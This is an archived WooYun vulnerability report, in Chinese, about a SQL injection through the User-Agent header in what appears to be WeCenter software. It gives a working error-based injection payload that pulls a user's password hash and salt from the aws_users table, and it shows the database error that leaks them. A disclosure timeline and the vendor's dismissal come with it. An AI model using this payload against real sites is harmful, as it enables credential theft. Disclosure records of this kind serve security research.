乌云(WooYun.org)历史漏洞查询---http://wy.zone.ci/
乌云 Drops 文章在线浏览--------http://drop.zone.ci/
2015-03-28: 细节已通知厂商并且等待厂商处理中 2015-04-02: 厂商主动忽略漏洞,细节向第三方安全合作伙伴开放 2015-05-27: 细节向核心白帽子及相关领域专家公开 2015-06-06: 细节向普通白帽子公开 2015-06-16: 细节向实习白帽子公开 2015-07-01: 细节向公众公开
无视GPC注入
设置user_agent注入语句为
' and(select 1 from(select count(*),concat((select concat(password,0x23,salt,0x23) from aws_users limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a)#
然后挂着页面几分钟再去访问任意页面就可以了
可以看到报错了
Database error ------ SQL: UPDATE `aws_users_online` SET `uid` = '2', `last_active` = '1427514371', `ip` = '2130706433', `user_agent` = '' and(select 1 from(select count(*),concat((select concat(password,0x23,salt,0x23) from aws_users limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a)#', `active_url` = 'http://127.0.0.1/wecenrt/?/search/q-MQ==' WHERE uid = 2 Error Message: Mysqli statement execute error : Duplicate entry '96a3a28f5c885b97db259b74bc2fddf1#dxaw#1' for key 'group_key'
我是本地搭建测试的
过滤
危害等级:无影响厂商忽略
忽略时间:2015-07-01 11:59
漏洞Rank:10 (WooYun评价)
暂无